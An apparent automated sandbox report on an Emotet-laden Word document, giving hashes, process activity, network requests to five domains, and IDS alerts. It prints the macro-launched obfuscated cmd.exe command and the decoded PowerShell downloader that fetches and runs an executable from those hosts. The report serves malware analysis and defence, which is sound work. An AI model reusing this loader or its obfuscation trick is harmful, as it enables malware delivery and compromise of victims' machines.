File name: | IBAN_DE52 6801 6095 5965 4596 78.doc |
Full analysis: | https://app.any.run/tasks/baa500d8-b55c-4eb6-bc70-eae0abcddb0c |
Verdict: | Malicious activity |
Threats: | Emotet is one of the most dangerous trojans ever created. Over the course of its lifetime, it was upgraded to become a very destructive malware. It targets mostly corporate victims but even private users get infected in mass spam email campaigns. |
Analysis date: | December 18, 2018, 10:13:44 |
OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
Tags: | |
Indicators: | |
MIME: | application/msword |
File info: | Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Template: Normal.dotm, Revision Number: 1, Name of Creating Application: Microsoft Office Word, Create Time/Date: Tue Dec 18 07:36:00 2018, Last Saved Time/Date: Tue Dec 18 07:36:00 2018, Number of Pages: 1, Number of Words: 5, Number of Characters: 33, Security: 0 |
MD5: | CF631DE9A77AE7603D4F46408314A685 |
SHA1: | 12353662A57BCC14FA0BAA2DCE07274D1DDD83CA |
SHA256: | 4F1281EA479C1F28305E4C4EBA67E0DC7782E8CE9A6118537E20590DE037410D |
SSDEEP: | 1536:FL4w1LD4fbKghmXB5luOUom8uW41LIpiXievnH+a9:Fcw13eKQOUo101O+iev |
.doc | | | Microsoft Word document (54.2) |
---|---|---|
.doc | | | Microsoft Word document (old ver.) (32.2) |
Title: | - |
---|---|
Subject: | - |
Author: | - |
Keywords: | - |
Comments: | - |
Template: | Normal.dotm |
LastModifiedBy: | - |
RevisionNumber: | 1 |
Software: | Microsoft Office Word |
TotalEditTime: | - |
CreateDate: | 2018:12:18 07:36:00 |
ModifyDate: | 2018:12:18 07:36:00 |
Pages: | 1 |
Words: | 5 |
Characters: | 33 |
Security: | None |
CodePage: | Windows Latin 1 (Western European) |
Company: | - |
Lines: | 1 |
Paragraphs: | 1 |
CharCountWithSpaces: | 37 |
AppVersion: | 16 |
ScaleCrop: | No |
LinksUpToDate: | No |
SharedDoc: | No |
HyperlinksChanged: | No |
TitleOfParts: | - |
HeadingPairs: |
|
CompObjUserTypeLen: | 32 |
CompObjUserType: | Microsoft Word 97-2003 Document |
PID | CMD | Path | Indicators | Parent process |
---|---|---|---|---|
2700 | "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Roaming\IBAN_DE52 6801 6095 5965 4596 78.doc" | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | — | explorer.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft Word Version: 14.0.6024.1000 | ||||
3084 | c:\sVwCiOzTWNiPm\WzCkFlcVSW\VlBsmipsbU\..\..\..\windows\system32\cmd.exe /c %ProgramData:~0,1%%ProgramData:~9,2% /V/C"set W6XZ=;'jcW'=Fjo$}}{hctac}};kaerb;'TLz'=lbz$;SEc$ metI-ekovnI{ )00008 eg- htgnel.)SEc$ metI-teG(( fI;'qpt'=whj$;)SEc$ ,NFz$(eliFdaolnwoD.ztL${yrt{)qjP$ ni NFz$(hcaerof;'exe.'+WCk$+'\'+pmet:vne$=SEc$;'SKz'=Tcu$;'599' = WCk$;'lvI'=brk$;)'@'(tilpS.'Of3mJi1/moc.gepohsknip.www//:ptth@0vb6pEI/gro.laiafamafa.www//:ptth@8IIXV32/gro.amhcim//:ptth@fURWISRxU8/moc.secivresretupmocaesnaws.www//:ptth@0NgwrKGs2Y/moc.oknecvov-llatsnner.www//:ptth'=qjP$;tneilCbeW.teN tcejbo-wen=ztL$;'rvj'=tZz$ llehsrewop&&for /L %X in (485,-1,0)do set Pjv=!Pjv!!W6XZ:~%X,1!&&if %X leq 0 call %Pjv:*Pjv!=%" | c:\windows\system32\cmd.exe | — | WINWORD.EXE |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 0 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) | ||||
3600 | CmD /V/C"set W6XZ=;'jcW'=Fjo$}}{hctac}};kaerb;'TLz'=lbz$;SEc$ metI-ekovnI{ )00008 eg- htgnel.)SEc$ metI-teG(( fI;'qpt'=whj$;)SEc$ ,NFz$(eliFdaolnwoD.ztL${yrt{)qjP$ ni NFz$(hcaerof;'exe.'+WCk$+'\'+pmet:vne$=SEc$;'SKz'=Tcu$;'599' = WCk$;'lvI'=brk$;)'@'(tilpS.'Of3mJi1/moc.gepohsknip.www//:ptth@0vb6pEI/gro.laiafamafa.www//:ptth@8IIXV32/gro.amhcim//:ptth@fURWISRxU8/moc.secivresretupmocaesnaws.www//:ptth@0NgwrKGs2Y/moc.oknecvov-llatsnner.www//:ptth'=qjP$;tneilCbeW.teN tcejbo-wen=ztL$;'rvj'=tZz$ llehsrewop&&for /L %X in (485,-1,0)do set Pjv=!Pjv!!W6XZ:~%X,1!&&if %X leq 0 call %Pjv:*Pjv!=%" | C:\Windows\system32\cmd.exe | — | cmd.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 0 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) | ||||
3556 | powershell $zZt='jvr';$Ltz=new-object Net.WebClient;$Pjq='http://www.rennstall-vovcenko.com/Y2sGKrwgN0@http://www.swanseacomputerservices.com/8UxRSIWRUf@http://michma.org/23VXII8@http://www.afamafaial.org/IEp6bv0@http://www.pinkshopeg.com/1iJm3fO'.Split('@');$krb='Ivl';$kCW = '995';$ucT='zKS';$cES=$env:temp+'\'+$kCW+'.exe';foreach($zFN in $Pjq){try{$Ltz.DownloadFile($zFN, $cES);$jhw='tpq';If ((Get-Item $cES).length -ge 80000) {Invoke-Item $cES;$zbl='zLT';break;}}catch{}}$ojF='Wcj'; | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | cmd.exe | |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) |
PID | Process | Filename | Type | |
---|---|---|---|---|
2700 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\CVR8785.tmp.cvr | — | |
MD5:— | SHA256:— | |||
2700 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\B162635.wmf | — | |
MD5:— | SHA256:— | |||
2700 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\660BAB0B.wmf | — | |
MD5:— | SHA256:— | |||
3556 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\II637KOP03C85POFUV3U.temp | — | |
MD5:— | SHA256:— | |||
3556 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms | binary | |
MD5:901ECDF767744E6BB59CB023757886E3 | SHA256:48A990A7B1201BFD70F417698302A6299D036A6574E558A96000AF48469479E1 | |||
2700 | WINWORD.EXE | C:\Users\admin\AppData\Roaming\Microsoft\Office\Recent\IBAN_DE52 6801 6095 5965 4596 78.doc.LNK | lnk | |
MD5:3C66E41A63B7591D4315E266D12501C8 | SHA256:0744C14B318CE323E6B70420142C4DD5FBB55AFFCB79FD98737FF7099E054478 | |||
3556 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF199967.TMP | binary | |
MD5:901ECDF767744E6BB59CB023757886E3 | SHA256:48A990A7B1201BFD70F417698302A6299D036A6574E558A96000AF48469479E1 | |||
2700 | WINWORD.EXE | C:\Users\admin\AppData\Roaming\~$AN_DE52 6801 6095 5965 4596 78.doc | pgc | |
MD5:61DE8F4C7E7AF82A26669CAEC4E93F98 | SHA256:2EFB60F4ED66E03FBBA8097064A17266A8E66F94F7049F5AC30A3BB14B86CE4A | |||
2700 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\1E860EB2.wmf | wmf | |
MD5:D31F314F50360B7D68385AA3AD4B7EEB | SHA256:1826C6896CDB40E50767602EF07506669328FD6E95804F7011F1714F4CE6C0B9 | |||
2700 | WINWORD.EXE | C:\Users\admin\AppData\Roaming\Microsoft\Office\Recent\index.dat | text | |
MD5:51EF8269800608EB4A492DF7A9890D6D | SHA256:C40D1987C2157469C7F30D1A7171BF8D01416373F811A916BF9204D14C47A1F7 |
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
---|---|---|---|---|---|---|---|---|---|
3556 | powershell.exe | GET | 404 | 93.90.146.103:80 | http://www.rennstall-vovcenko.com/Y2sGKrwgN0 | SE | xml | 345 b | malicious |
3556 | powershell.exe | GET | 404 | 192.185.153.254:80 | http://www.swanseacomputerservices.com/8UxRSIWRUf | US | xml | 345 b | malicious |
3556 | powershell.exe | GET | 404 | 50.87.248.189:80 | http://michma.org/23VXII8 | US | xml | 345 b | malicious |
3556 | powershell.exe | GET | 404 | 162.214.0.89:80 | http://www.pinkshopeg.com/1iJm3fO | US | xml | 345 b | malicious |
3556 | powershell.exe | GET | 404 | 208.115.221.18:80 | http://www.afamafaial.org/IEp6bv0 | US | xml | 345 b | malicious |
PID | Process | IP | Domain | ASN | CN | Reputation |
---|---|---|---|---|---|---|
3556 | powershell.exe | 93.90.146.103:80 | www.rennstall-vovcenko.com | Levonline AB | SE | suspicious |
3556 | powershell.exe | 192.185.153.254:80 | www.swanseacomputerservices.com | CyrusOne LLC | US | malicious |
3556 | powershell.exe | 50.87.248.189:80 | michma.org | Unified Layer | US | malicious |
3556 | powershell.exe | 208.115.221.18:80 | www.afamafaial.org | Limestone Networks, Inc. | US | malicious |
3556 | powershell.exe | 162.214.0.89:80 | www.pinkshopeg.com | Unified Layer | US | malicious |
Domain | IP | Reputation |
---|---|---|
www.rennstall-vovcenko.com |
| malicious |
www.swanseacomputerservices.com |
| malicious |
michma.org |
| malicious |
www.afamafaial.org |
| malicious |
www.pinkshopeg.com |
| malicious |
PID | Process | Class | Message |
---|---|---|---|
3556 | powershell.exe | A Network Trojan was detected | SC TROJAN_DOWNLOADER Suspicious loader with tiny header |
3556 | powershell.exe | A Network Trojan was detected | SC TROJAN_DOWNLOADER Trojan-Downloader Emoloader Win32 |
3556 | powershell.exe | A Network Trojan was detected | SC TROJAN_DOWNLOADER Suspicious loader with tiny header |
3556 | powershell.exe | A Network Trojan was detected | SC TROJAN_DOWNLOADER Trojan-Downloader Emoloader Win32 |
3556 | powershell.exe | A Network Trojan was detected | SC TROJAN_DOWNLOADER Suspicious loader with tiny header |
3556 | powershell.exe | A Network Trojan was detected | SC TROJAN_DOWNLOADER Trojan-Downloader Emoloader Win32 |
3556 | powershell.exe | A Network Trojan was detected | SC TROJAN_DOWNLOADER Suspicious loader with tiny header |
3556 | powershell.exe | A Network Trojan was detected | SC TROJAN_DOWNLOADER Trojan-Downloader Emoloader Win32 |
3556 | powershell.exe | A Network Trojan was detected | SC TROJAN_DOWNLOADER Suspicious loader with tiny header |
3556 | powershell.exe | A Network Trojan was detected | SC TROJAN_DOWNLOADER Trojan-Downloader Emoloader Win32 |